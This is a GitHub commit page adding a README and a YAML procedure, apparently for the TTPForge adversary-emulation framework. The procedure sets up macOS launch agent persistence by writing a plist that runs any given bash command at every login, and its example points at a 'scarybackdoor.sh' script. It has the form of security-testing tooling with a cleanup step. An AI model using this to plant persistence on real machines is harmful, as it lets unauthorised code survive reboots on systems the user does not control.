-
Notifications
You must be signed in to change notification settings - Fork 22
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
82 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
# macOS Launch Agent Persistence | ||
|
||
Create and manage a launch agent on macOS, allowing for persistent execution of a | ||
given script or command. The launch agent will execute the specified script or | ||
command each time the system reboots or the user logs in. | ||
|
||
## Arguments | ||
|
||
- **command_or_path**: This argument specifies the path to the script or a bash | ||
command to be run by the launch agent. | ||
|
||
- **cleanup**: When set to true, it will remove the launch agent plist file and | ||
any related scripts, undoing the persistence setup. | ||
|
||
## Pre-requisites | ||
|
||
Ensure that you have the necessary permissions to create files in the user's | ||
`~/Library/LaunchAgents` directory and execute the specified script or command. | ||
|
||
## Examples | ||
|
||
Set up launch agent persistence with a specific script. The agent will execute | ||
the script every time the system reboots or the user logs in. If cleanup is set | ||
to true, the launch agent and related files will be removed after 3 minutes: | ||
|
||
```bash | ||
ttpforge -c config.yaml \ | ||
run ttps/persistence/macos/launch-agent-persistence/launch-agent-persistence.yaml \ | ||
--arg command_or_path="/Users/Shared/scarybackdoor.sh" \ | ||
--arg cleanup=true | ||
``` | ||
|
||
Alternatively, you can use a direct bash command: | ||
|
||
```bash | ||
ttpforge -c config.yaml \ | ||
run ttps/persistence/macos/launch-agent-persistence/launch-agent-persistence.yaml \ | ||
--arg command_or_path="bash -c echo Oh uh" \ | ||
--arg cleanup=true | ||
``` |
42 changes: 42 additions & 0 deletions
42
persistence/macos/launch-agent-persistence/launch-agent-persistence.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
--- | ||
name: macOS Launch Agent persistence. | ||
description: | | ||
Simple TTP to setup and load launch agent persistence on macOS. | ||
args: | ||
- name: cleanup | ||
- name: command_or_path | ||
|
||
steps: | ||
- name: launchagent | ||
inline: | | ||
command_or_path="{{args.command_or_path}}" | ||
echo "===> Creating ~/Library/LaunchAgents if it does not already exist..." | ||
mkdir -p /Users/$USER/Library/LaunchAgents | ||
echo "===> Writing plist to ~/Library/LaunchAgents/com.ttpforge.plist" | ||
cat <<EOF > ~/Library/LaunchAgents/com.ttpforge.plist | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE plist PUBLIC "-//Apple/DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | ||
<plist version="1.0"> | ||
<dict> | ||
<key>Label</key> | ||
<string>com.ttpforge.plist</string> | ||
<key>ProgramArguments</key> | ||
<array> | ||
<string>bash</string> | ||
<string>-c</string> | ||
<string>$command_or_path</string> | ||
</array> | ||
<key>KeepAlive</key> | ||
<true/> | ||
</dict> | ||
</plist> | ||
EOF | ||
echo "===> Persistence done. ~/Library/LaunchAgents/com.ttpforge.plist dropped which executes $command_or_path. Persistence will be loaded on next reboot." | ||
cleanup: | ||
inline: | | ||
if [[ "{{args.cleanup}}" == "true" ]]; then | ||
rm -rf ~/Library/LaunchAgents/com.ttpforge.plist /tmp/launchagent-* | ||
fi |